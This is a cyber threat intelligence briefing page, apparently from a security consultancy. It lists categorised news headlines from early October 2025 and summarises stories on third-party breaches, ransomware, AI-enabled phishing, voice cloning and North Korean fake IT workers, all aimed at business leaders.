Jaguar Land Rover expected to restart some production after cyber-attack - BBC News

The Guardian view on the Jaguar Land Rover cyber-attack: ministers must pay more attention to this growing risk | Editorial | The Guardian

Aston Martin warns of disruption in wake of JLR cyber attack

JLR counts cost of cyber hack with UK retail sales down 32% | Manufacturer News

Co-op set to reveal financial toll caused by cyberattack | The Independent

Teens arrested in London preschool ransomware attack • The Register

Phishing & Email Based Attacks

Yubico survey exposes cybersecurity gap as organizations lag on training while phishing scams evolve faster than most defenses can adapt | TechRadar

SpamGPT - When Phishing Gets a Marketing Degree - Security Boulevard

Phishing Is Only the Tip of Cybersecurity’s AI Arms Race | MSSP Alert

Phishing is old, but AI just gave it new life - Help Net Security

New ‘point-and-click’ phishing kit simplifies malicious attachment creation | SC Media

How Phishing Kits Are Evading Detection & Ways to Beat Them | MSSP Alert

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Why Brand Impersonation Is A Marketing Crisis, Not Just A Cybersecurity Problem

Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks

Other Social Engineering

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

North Korean hackers stealing record sums, researchers say - BBC News

New FileFix attack uses cache smuggling to evade security software

Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware

BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

Fraud, Scams and Financial Crime

Digital Fraud Costs Companies Worldwide 7.7% of Annual Revenue - Infosecurity Magazine

More than a third of Brits would give up online shopping over fears of identity theft - InternetRetailing

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Former Tory council leader on trial over alleged romance fraud - BBC News

Risks of cyber fraud allegations remain high for companies subject to government requirements - Nextgov/FCW

Artificial Intelligence

SMBs vulnerable to AI-powered cyberattacks and complacent about ransomware - BetaNews

SpamGPT - When Phishing Gets a Marketing Degree - Security Boulevard

Phishing Is Only the Tip of Cybersecurity’s AI Arms Race | MSSP Alert

Phishing is old, but AI just gave it new life - Help Net Security

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

Microsoft's Voice Clone Becomes Scary & Unsalvageable

FraudGPT and WormGPT, are now available on dark net forums for as low as $100 - The420.in

AI is making cybercriminal workflows more efficient too, OpenAI finds | ZDNET

Two-thirds of bank staff using unapproved AI tools - survey

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

Employees regularly paste company secrets into ChatGPT • The Register

How Your AI Chatbot Can Become a Backdoor | Trend Micro (US)

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

What CISOs should know about DeepSeek cybersecurity risks | TechTarget

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Take Note: Cyber-Risks With AI Notetakers

CometJacking: One Click Can Turn Perplexity's Comet AI Browser Into a Data Thief

ICO’s £7.5m Clearview AI Fine a Step Closer After Legal Victory - Infosecurity Magazine

Malware

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

Sophisticated Malware Deployed in Oracle EBS Zero-Day Attacks - SecurityWeek

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

New FileFix attack uses cache smuggling to evade security software

Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware

Hackers Exploit RMM Tools to Deploy Malware - InfoRiskToday

From infostealer to full RAT: dissecting the PureRAT attack chain

BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

XWorm malware resurfaces with ransomware module, over 35 plugins

Detour Dog Caught Running DNS-Powered Malware Factory for Strela Stealer

New "Cavalry Werewolf" Attack Hits Russian Agencies with FoalShell and StallionRAT

Self-Propagating Malware Hits WhatsApp Users in Brazil

Bots/Botnets

RondoDox botnet fires 'exploit shotgun' at edge devices • The Register

The architecture of lies: Bot farms are running the disinformation war - Help Net Security

Mobile

Google Pixel October security patch continues to fix haunting display problems | Android Central

New ClayRat Spyware Targets Android Users via Fake WhatsApp and TikTok Apps

Android spyware pretends to be Signal or ToTok update to fool victims - here's how to stay safe | TechRadar

Self-Propagating Malware Hits WhatsApp Users in Brazil

Denial of Service/DoS/DDoS

Critical networks face unprecedented threat as DDoS attacks are getting shorter and more intense | IT Pro

Telco biz ICUK restores services after two-day DDoS pelting • The Register

Internet of Things – IoT

Connected devices in the workplace: innovation or a gateway for cyberattacks?

Building owners face up to growing cyber threat

How to protect your car from hacking | Kaspersky official blog

Data Breaches/Leaks

Red Hat Breach Exposes 5000+ High Profile Enterprise Customers at Risk

SonicWall admits attacker accessed all customer firewall configurations stored on cloud portal | CyberScoop

Google says 'likely over 100' affected by Oracle-linked hacking campaign | Reuters

CL0P-Linked Hackers Breach Dozens of Organizations Through Oracle Software Flaw

Hackers claim to have stolen over a billion Salesforce records - and are demanding nearly $1 billion not to leak them | TechRadar

Discord discloses data breach after hackers steal support tickets

Hackers claim Discord breach exposed data of 5.5 million users

Renault warns UK customers after cyberattack exposes data

Military radio maker BK Technologies cops to cyber break-in • The Register

Electronics giant Avnet confirms breach, says stolen data unreadable

Dutch travel company refuses compensation after cyberattack exposes customer data | NL Times

Data Breach at Doctors Imaging Group Impacts 171,000 People - SecurityWeek

Huawei Under Fire Again: Alleged Data Breach and Espionage Claims Stir Controversy - Cybersecurity Insiders

Sunweb confirms data breach, warns customers to be on their guard | TechRadar

DraftKings warns of account breaches in credential stuffing attacks

Boyd Gaming sued by employee over data breach | Cybernews

Organised Crime & Criminal Actors

Europol Calls for Stronger Data Laws to Combat Cybercrime - Infosecurity Magazine

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

North Korean hackers stole $2 billion in crypto this year: report - UPI.com

Kremlin-backed crypto coin moves $6bn despite US sanctions

Politics Home Article | UK Faces Diplomatic Battle Over £5.5bn Bitcoin Claim

Insider Risk and Insider Threats

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

Employees regularly paste company secrets into ChatGPT • The Register

BBC journalist lured with promises of millions in ransom before hackers unleashed chaotic phone attacks in chilling twist | TechRadar

Insurance

Cyber cover concerns remain for risk managers – FERMA

Cyber insurance should complement, not replace, cybersecurity: FERMA - Reinsurance News

Impacts of Cyber Threat Landscape on Insurers and Policyholders | Gray Reed - JDSupra

Why cyber-security insurance matters for charities | Third Sector

Supply Chain and Third Parties

75% of Orgs. Had a SaaS Security Incident Despite High Confidence in Their Security. Here’s Why. - Security Boulevard

Cybersecurity Needs A Supply Chain Perspective: JLR attack Shows Why

Nearly a third of bosses report increase in cyber-attacks on their supply chains | Business | The Guardian

The cost of cyber hacking on UK business is greater than it seems - BBC News

Discord says sensitive info stolen during cyberattack on customer service provider | The Record from Recorded Future News

Cyber-Attack Contributes to Huge Sales Drop at JLR - Infosecurity Magazine

Cloud/SaaS

Nearly a third of bosses report increase in cyber-attacks on their supply chains | Business | The Guardian

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

Hackers claim Discord breach exposed data of 5.5 million users

Discord Says 70,000 Users Had IDs Exposed in Recent Data Breach - SecurityWeek

Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware

Microsoft 365 outage blocks access to Teams, Exchange Online

Outages

Microsoft 365 outage blocks access to Teams, Exchange Online

Azure outage blocks access to Microsoft 365 services, admin portals

Encryption

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

Massive surge in scans targeting Palo Alto Networks login portals

DraftKings warns of account breaches in credential stuffing attacks

Social Media

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

LinkedIn sues ProAPIs for using 1M fake accounts to scrape user data

Malvertising

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Regulations, Fines and Legislation

Europol Calls for Stronger Data Laws to Combat Cybercrime - Infosecurity Magazine

Invite us to your cyber war games, Finra urges members - Risk.net

German government says it will oppose EU mass-scanning proposal | CyberScoop

ICO’s £7.5m Clearview AI Fine a Step Closer After Legal Victory - Infosecurity Magazine

Federal judiciary touts cybersecurity work in wake of latest major breach | CyberScoop

State Cyber Teams Brace for Impact of US Government Shutdown

Federal shutdown deals blow to already hobbled cybersecurity agency

UK government says digital ID won't be compulsory – honest • The Register

Careers, Working in Cyber and Information Security

Research Finds Budgets, Staffing and Skills Fail to Keep Pace with Rising Cyber Threats - IT Security Guru

How to succeed at cybersecurity job interviews - Help Net Security

Law Enforcement Action and Take Downs

Teens arrested in London preschool ransomware attack • The Register

Arrests Underscore Fears of Teen Cyberespionage Recruitment

Politics Home Article | UK Faces Diplomatic Battle Over £5.5bn Bitcoin Claim

Former Tory council leader on trial over alleged romance fraud - BBC News

Misinformation, Disinformation and Propaganda

The architecture of lies: Bot farms are running the disinformation war - Help Net Security

Lessons in Resilience: Moldova’s Response to Russia’s Hybrid Interference | German Marshall Fund of the United States

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Russia: already at war with Europe? | The Week

"We are already in the middle of a cyber war” - NATO expert warns - 08.10.2025 | BURSA.RO

Russia waging ‘grey-zone campaign’ and Europe must meet challenge, says EU chief

Nation State Actors

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

China

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Security Firm Exposes Role of Beijing Research Institute in China's Cyber Operations - SecurityWeek

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

China-linked hacking fears over Cisco devices in offices

PRC Gov't Fronts Trick the West to Obtain Cyber Tech

What CISOs should know about DeepSeek cybersecurity risks | TechTarget

Law firm representing big-name politicians hit with major hack from China: report - Raw Story

Chinese Cybercrime Group Runs Global SEO Fraud Ring Using Compromised IIS Servers

Most telcos have been hit by Salt Typhoon-style attacks

Huawei Under Fire Again: Alleged Data Breach and Espionage Claims Stir Controversy - Cybersecurity Insiders

No 10 denies government involved in collapse of China spying case - BBC News

Russia

Russia: already at war with Europe? | The Week

"We are already in the middle of a cyber war” - NATO expert warns - 08.10.2025 | BURSA.RO

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

Russia waging ‘grey-zone campaign’ and Europe must meet challenge, says EU chief

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Lessons in Resilience: Moldova’s Response to Russia’s Hybrid Interference | German Marshall Fund of the United States

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Arrests Underscore Fears of Teen Cyberespionage Recruitment

Kremlin-backed crypto coin moves $6bn despite US sanctions

Cooper’s £4m plan to turn tables on Russian hackers

New "Cavalry Werewolf" Attack Hits Russian Agencies with FoalShell and StallionRAT

North Korea

North Korean hackers stole $2 billion in crypto this year: report - UPI.com

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

Tools and Controls

Insurers and asset managers strengthen cybersecurity oversight and expand budgets: Moody’s - Reinsurance News

Cyber cover concerns remain for risk managers – FERMA

Cyber insurance should complement, not replace, cybersecurity: FERMA - Reinsurance News

SonicWall admits attacker accessed all customer firewall configurations stored on cloud portal | CyberScoop

Research Finds Budgets, Staffing and Skills Fail to Keep Pace with Rising Cyber Threats - IT Security Guru

Invite us to your cyber war games, Finra urges members - Risk.net

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

Hackers Exploit RMM Tools to Deploy Malware - InfoRiskToday

Why Brand Impersonation Is A Marketing Crisis, Not Just A Cybersecurity Problem

Cybersecurity Tops CFO’s Risk Agenda With 99% Reporting Incidents and 94% Planning to Increase Spend

Six metrics policymakers need to track cyber resilience - Help Net Security

NCSC: Observability and Threat Hunting Must Improve - Infosecurity Magazine

Hundreds of free VPNs offer 'no real privacy at all,' researchers warn - does yours? | ZDNET

Are VPNs Under Attack? An Anti-Censorship Group Speaks Out - CNET

How CISOs can get out of security debt and why it matters | TechTarget

Ransomware Gangs Leverage Remote Access Tools to Gain Persistence and Evade Defenses

Take Note: Cyber-Risks With AI Notetakers

Edge device security: The frontline of your network - Security Boulevard

Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

Reports Published in the Last Week

Comcast Business Releases 2025 Cybersecurity Threat Report Analyzing 34.6 Billion Events

Reading the ENISA Threat Landscape 2025 report

Other News

Cybersecurity concerns on the rise for consumers

Nearly half of Brits now talk cybersecurity over the kitchen table, research by Mastercard finds

Invite us to your cyber war games, Finra urges members - Risk.net

How CISOs can get out of security debt and why it matters | TechTarget

Six out of 10 UK secondary schools hit by cyber-attack or breach in past year | Cybercrime | The Guardian

Experts Warn The Internet Will Go Down In A Big Way — And You'd Better Be Ready

Microsoft: Hackers target universities in “payroll pirate” attacks

ING's CISO on How Emerging Tech and Regulations are Reshaping Cybersec - Infosecurity Magazine

Stop trusting your ISP's router blindly

Hacktivists target critical infrastructure, hit decoy plant

Securing the final frontier: the new legal urgency of cyber security in space

Vulnerability Management

Vulnerabilities

SonicWall admits attacker accessed all customer firewall configurations stored on cloud portal | CyberScoop

Oracle Rushes Patch for CVE-2025-61882 After Cl0p Exploited It in Data Theft Attacks

CISA Warns of Windows Privilege Escalation Vulnerability Exploited in Attacks

Microsoft: Critical GoAnywhere bug exploited in ransomware attacks

Zimbra users targeted in zero-day exploit using iCalendar attachments

Google Pixel October security patch continues to fix haunting display problems | Android Central

Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks

Critical Vulnerability Puts 60,000 Redis Servers at Risk of Exploitation - SecurityWeek

Critical Exploit Lets Hackers Bypass Authentication in WordPress Service Finder Theme

7-Zip Vulnerabilities Let Attackers Execute Arbitrary Code Remotely

Google won’t fix new ASCII smuggling attack in Gemini

CometJacking: One Click Can Turn Perplexity's Comet AI Browser Into a Data Thief

CVE-2025-5947: WordPress Plugin flaw lets hackers access Admin accounts

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 05/10/2025 Black Arrow Admin 05/10/2025

Black Arrow Cyber Threat Intelligence Briefing 03 October 2025

Black Arrow Cyber Threat Intelligence Briefing 03 October 2025:

-IT Provider Probed as Possible Entry Point in JLR and M&S Breaches

-Security Leaders See Attacks Growing in Frequency and Impact

-Expert Says Basic Security Lapses Still Drive High Profile Breaches

-Russian Vessel Suspected of Mapping Europe’s Undersea Cables

-Hiscox: 80% Of Victims Paid Ransoms and Many Faced Extra Demands

-Allianz: Ransomware Still Drives Large Claims as Criminals Focus on Data Theft

-How Criminals Use AI To Supercharge Phishing and Scams

-Proofpoint: Phishing Remains the Leading Breach Path as AI Raises the Stakes

-ENISA: Phishing Dominated EU Intrusions Over the Past Year

-Phishing Is Shifting to Mobile Channels and Security Must Follow

-Survey Finds Most Workers Cannot Spot AI-Written Phishing Emails

-Researchers Demonstrate Real-Time Voice Cloning for Vishing Attacks

-Okta Warns of North Korean Fake IT Workers Targeting More Sectors

Executive Summary

We report this week how organisations are attacked through their IT provider, highlighting that business leaders need to understand their third-party and outsourcing risks. Business leaders are seeing various attacks growing in frequency and impact; the solutions are relatively simple but require the leadership to take ownership of security and also prepare how to manage an incident.

We see several stories this week about phishing, which is still a favourite attack route and is made more impactful through AI. We also include a report on organisations that pay ransoms and how this leads to further demands from the attackers.

Our message remains constant and clear: to be more secure and resilient against attacks, business leaders need to upskill on cyber fundamentals and govern cyber risks akin to other risks by working with control providers across technology, operations and people. In our view, the risks grow when cyber security is considered an operational IT topic. Contact us to find out the key risks and how to improve security and resilience in a pragmatic and proportionate manner.

IT Provider Probed as Possible Entry Point in JLR and M&S Breaches

A report explores whether IT helpdesks run by a major outsourcer became an easy route for attackers during recent UK retail and automotive incidents. Politicians have requested clarity on the outsourcer’s role, and prior NCSC guidance warned that password reset teams are prime targets. The piece underlines the importance of boards correctly understanding their third party and outsourcing risks.

Source: https://www.telegraph.co.uk/business/2025/09/26/suspected-weak-link-in-jaguar-land-rover-ms-hacks/

Security Leaders See Attacks Growing in Frequency and Impact

A survey highlights that executives report more frequent attacks and bigger consequences year on year. Many fear nation state activity will expand beyond government into commercial sectors, while AI is seen as both an accelerator for attackers and a tool for defenders. The findings point to greater attention on supply chain security, incident reporting to executives, and the need for leaders to ensure they can correctly respond to an incident.

Source: https://www.helpnetsecurity.com/2025/09/29/cyberattacks-frequency-impact-growth/

Expert Says Basic Security Lapses Still Drive High Profile Breaches

Recent attacks on well known brands highlight that simple mistakes remain common. The analysis stresses credential hygiene, stronger authentication and supplier dependency management, noting how outages ripple through manufacturing ecosystems and put smaller partners at risk.

Source: https://www.rte.ie/news/business/2025/0930/1536021-cyber-security-data/

Russian Vessel Suspected of Mapping Europe’s Undersea Cables

Satellite data revealed a Russian ship operating near critical energy and telecoms cables in European waters. Experts warn this activity aligns with Moscow’s strategy to prepare covert disruption options in case of conflict. The vessel can intercept communications and potentially plant explosives, raising concerns about resilience of subsea infrastructure vital to energy and data flows.

Source: https://kyivindependent.com/investigation-finds-russian-sabotage-ship-near-european-undersea-cables-ft-reports/

Hiscox: 80% Of Victims Paid Ransoms and Many Faced Extra Demands

An insurer’s study finds most SME victims that paid ransoms did not fully recover data and a sizeable share received follow on demands. The wider dataset shows more firms reporting attacks and citing AI exposure, underlining the business case for recovery readiness and governance over whether to pay ransoms.

Source: https://news.sky.com/story/cyber-attacks-80-of-ransomware-victims-pay-up-insurer-says-13441131

Allianz: Ransomware Still Drives Large Claims as Criminals Focus on Data Theft

In H1 2025 ransomware represented about 60% of €1m plus claims. Attackers increasingly exfiltrate data to force payment, and SMEs are being hit harder while large firms’ resilience improves. Social engineering and compromised credentials remain common entry points.

Source: https://www.helpnetsecurity.com/2025/10/01/insurance-claims-ransomware-h1-2025/

How Criminals Use AI To Supercharge Phishing and Scams

Threat actors use generative AI to clone voices and faces, craft believable messages, and spin up fraudulent websites at speed. The post outlines how romance and investment scams are scaled by chatbots, and why cross channel verification and layered controls are needed to counter deepfakes and synthetic identities.

Source: https://www.kaspersky.co.uk/blog/ai-phishing-and-scams/29518/

Proofpoint: Phishing Remains the Leading Breach Path as AI Raises the Stakes

At its annual event, Proofpoint highlighted email as the dominant route to compromise and detailed how AI is being used by both attackers and defenders. The firm shared telemetry on scanning billions of messages and noted widespread risky user behaviour, reinforcing the need for controls that assume fallible humans.

Source: https://www.techrepublic.com/article/news-proofpoint-conference-ai-email-security-phishing/

ENISA: Phishing Dominated EU Intrusions Over the Past Year

The European Union Agency for Cyber Security (ENISA) assessment finds phishing accounted for 60% of observed initial access, ahead of vulnerability exploitation. DDoS featured in a high number of incidents, and hacktivists were using social media and other routes to promote their activity. The report stresses the interdependency risks in European supply chains and the growing use of AI to scale social engineering.

Source: https://www.infosecurity-magazine.com/news/phishing-dominates-euwide/

Phishing Is Shifting to Mobile Channels and Security Must Follow

Analysis argues attackers increasingly bypass email to reach users via SMS, voice and QR codes, often evading enterprise controls. Organisations are urged to extend protection to mobile and collaboration apps and to focus on human layer detection and response.

Source: https://www.darkreading.com/cyber-risk/phishing-moving-email-mobile-is-your-security

Survey Finds Most Workers Cannot Spot AI-Written Phishing Emails

Research shows 54% of respondents failed to identify phishing emails crafted by AI, with younger staff most vulnerable. Nearly 40% have never received cyber security training, and MFA adoption remains below 50%. The findings underline the urgency for awareness programmes and layered defences as AI makes social engineering harder to detect.

Source: https://www.techradar.com/pro/security/most-people-still-cant-identify-a-phishing-attack-written-by-ai-and-thats-a-huge-problem-survey-warns

Researchers Demonstrate Real-Time Voice Cloning for Vishing Attacks

Security experts successfully used AI to clone voices in real time during simulated attacks, convincing targets to perform sensitive actions such as password resets. The technique bypasses traditional safeguards and exploits trust in familiar caller IDs. Businesses are urged to strengthen verification processes for voice-based requests.

Source: https://www.technewsworld.com/story/researchers-mount-vishing-attacks-with-real-time-voice-cloning-179945.html

Okta Warns of North Korean Fake IT Workers Targeting More Sectors

Okta’s research tracks thousands of fraudulent job interviews by DPRK linked actors posing as remote developers. Targets now include healthcare, finance and AI companies, not just big tech. The activity aims to generate revenue and enable access for further abuses, reinforcing the need for stronger hiring verification and endpoint controls.

Source: https://www.theregister.com/2025/09/30/north_korean_it_workers_okta/

Governance, Risk and Compliance

Cybersecurity leaders underreport cyber incidents to executives - Help Net Security

Companies are facing more cyberattacks than ever before - and many just can't cope | TechRadar

Budgets, Staffing and Skills Fail to Keep Pace With Rising Cyber Threats, Finds New ISACA Research

Security risks leave 84 percent of IT pros feeling stressed at work - BetaNews

SMEs to step up cyber defences as over half experience cyber attack in past year - Insurance Age

High profile cyber attacks often down to basic errors

Why is everything being hacked? - New Statesman

CIISec Members Say Budgets Are Falling Behind Threats - Infosecurity Magazine

The warning signs are clear: We’re heading toward a digital crisis

Why burnout is a growing problem in cybersecurity - BBC News

Two-Thirds of Organizations Have Unfilled Cybersecurity Positions - Infosecurity Magazine

Cybersecurity 2025: Key stats on risk and resilience

Threats

Ransomware, Extortion and Destructive Attacks

High profile cyber attacks often down to basic errors

New LockBit Ransomware Variant Emerges as Most Dangerous Yet - Infosecurity Magazine

Akira ransomware: From SonicWall VPN login to encryption in under four hours - Help Net Security

Scattered Spider, ShinyHunters Restructure - New Attacks Underway

Cyber attacks: '80%' of ransomware victims pay up, insurer says | Money News | Sky News

Ransomware remains the leading cause of costly cyber claims - Help Net Security

Organisations struggle to recognise lingering effects of ransomware - TechCentral.ie

Third of cyber security professionals feel guilt over ransomware attacks - TechCentral.ie

Ransomware gang sought BBC reporter’s help in hacking media giant

Attackers Use AI to Build Ransomware at Rapid Scale

Google Sheds Light on ShinyHunters' Salesforce Tactics

Why The US Just Put An $11M Dollar Bounty On This Ukranian Hacker

Ransomware is becoming a psy-ops assault on healthcare executives | SC Media

Ransomware Victims

The suspected weak link in the Jaguar Land Rover and M&S hacks

UK giants hit by cyberattacks: how Co-op, M&S, JLR disruption expose vulnerabilities | Invezz

UK Has Suffered at Least 26 Major Cyberattacks in Last Five Years – Guido Fawkes

Jaguar Land Rover rescued with £1.5bn government-backed loan after crippling cyber attack | UK News | Sky News

Over three-quarters of West Midlands firms feel impact of JLR cyber-attack - The Stratford Observer

Tata Motors shares slip 1% as Moody’s downgrades outlook after JLR cyber incident - The Economic Times

Red Hat confirms security incident after hackers claim GitHub breach

Japan's beer giant Asahi Group cannot resume production after cyberattack | Reuters

Hackers say they have deleted children's pictures and data after nursery attack backlash - BBC News

Google warns of Cl0p extortion campaign against Oracle E-Business users

Data breach at dealership software provider impacts 766k clients

Hackers claim theft of Boeing supplier documents | Cybernews

Phishing & Email Based Attacks

Phishing Is Moving to Mobile. Is Your Security?

UK IT Leaders Warn That Email Is the Front Door for Cyber Risk - and It’s Still Wide Open

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

Proofpoint Exec: 'Phishing is the Leading Cause of Breaches Globally'

How attackers poison AI tools and defenses - Help Net Security

Most people still can’t identify a phishing attack written by AI - and that's a huge problem, survey warns | TechRadar

Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

Phishing Dominates EU-Wide Intrusions, says ENISA - Infosecurity Magazine

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

New MatrixPDF toolkit turns PDFs into phishing and malware lures

Ukrainian Cops Spoofed in Fileless Phishing on Kyiv

Business Email Compromise (BEC)/Email Account Compromise (EAC)

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

North Korea’s fake IT workers targeting healthcare, finance • The Register

Real-Time AI Voice Cloning Powers Convincing Vishing Attacks

Your Service Desk is the New Attack Vector—Here's How to Defend It.

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

That annoying SMS phish you just got may have come from a box like this - Ars Technica

Other Social Engineering

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

North Korea’s fake IT workers targeting healthcare, finance • The Register

Your Service Desk is the New Attack Vector—Here's How to Defend It.

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

That annoying SMS phish you just got may have come from a box like this - Ars Technica

Fraud, Scams and Financial Crime

Brits warned as illegal robo-callers fined £550,000 • The Register

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Artificial Intelligence

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

Proofpoint Exec: 'Phishing is the Leading Cause of Breaches Globally'

Most people still can’t identify a phishing attack written by AI - and that's a huge problem, survey warns | TechRadar

Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

43% of workers say they've shared sensitive info with AI - including financial and client data | ZDNET

Attackers Use AI to Build Ransomware at Rapid Scale

LLM-Based LAMEHUG Malware Dynamically Generate Commands for Reconnaissance and Data Theft

UN seeks to build consensus on ‘safe, secure and trustworthy’ AI | CyberScoop

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Beware! Threat Actors Distributing Malicious AI Tools as Chrome Extensions - Cyber Security News

Dark side of the boom: How hackers are vibing with AI - The Economic Times

The hidden cyber risks of deploying generative AI

Google Gemini Vulnerabilities Let Attackers Exfiltrate User’s Saved Data and Location

Microsoft Reduces Israel's Access to Cloud and AI Products Over Reports of Mass Surveillance in Gaza - SecurityWeek

Google Patches Gemini AI Hacks Involving Poisoned Logs, Search Results - SecurityWeek

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

2FA/MFA

Gone in 60 Minutes: Akira Defeats MFA for SonicWall SSL VPNs

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

Malware

LLM-Based LAMEHUG Malware Dynamically Generate Commands for Reconnaissance and Data Theft

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Beware! Threat Actors Distributing Malicious AI Tools as Chrome Extensions - Cyber Security News

New MatrixPDF toolkit turns PDFs into phishing and malware lures

This devious malware has jumped from Meta over to Google Ads and YouTube to spread - here's how to stay safe | TechRadar

Weaponized Malwarebytes, LastPass, Citibank, SentinelOne, and Others on GitHub Deliver Malware

Hackers Injecting Exploiting WordPress Websites With Silent Malware to Gain Admin Access

Fake Microsoft Teams installers push Oyster malware via malvertising

Security Bite: Mac users are finally taking malware seriously, per new report - 9to5Mac

Fake Postmark MCP npm package stole emails with one-liner • The Register

Microsoft leaves Mac users exposed to GitHub Mac malware

Confucius Shifts from Document Stealers to Python Backdoors - Infosecurity Magazine

Researchers Expose SVG and PureRAT Phishing Threats Targeting Ukraine and Vietnam

Microsoft uncovers new variant of XCSSET macOS malware in targeted attacks

China-linked APT Phantom Taurus uses Net-Star malware in espionage campaigns against key sectors

New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPs

Mobile

Phishing Is Moving to Mobile. Is Your Security?

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

Brits warned as illegal robo-callers fined £550,000 • The Register

That annoying SMS phish you just got may have come from a box like this - Ars Technica

New Android RAT Klopatra Targets Financial Data - Infosecurity Magazine

Android malware uses VNC to give attackers hands-on access

How Android 16 Will Detect Fake Cell Towers To Help Keep You Safe

Apple Updates iOS and macOS to Prevent Malicious Font Attacks - SecurityWeek

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

Smishing Campaigns Exploit Cellular Routers to Target Belgium - Infosecurity Magazine

Denial of Service/DoS/DDoS

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

Council website down as group claims Suffolk and Essex cyber-attacks - BBC News

Internet of Things – IoT

Tile security flaws can let stalkers track your location, and more

Army says it's mitigated 'critical' cybersecurity deficiencies in early NGC2 prototype - Breaking Defense

Data Breaches/Leaks

LLM-Based LAMEHUG Malware Dynamically Generate Commands for Reconnaissance and Data Theft

Red Hat breach might affect major organizations | Cybernews

Unofficial Postmark MCP npm silently stole users' emails

Oracle customers being bombarded with emails claiming widespread data theft | CyberScoop

Hackers 'behind nursery cyber attack' tell Sky News they are releasing more data on dozens of children | UK News | Sky News

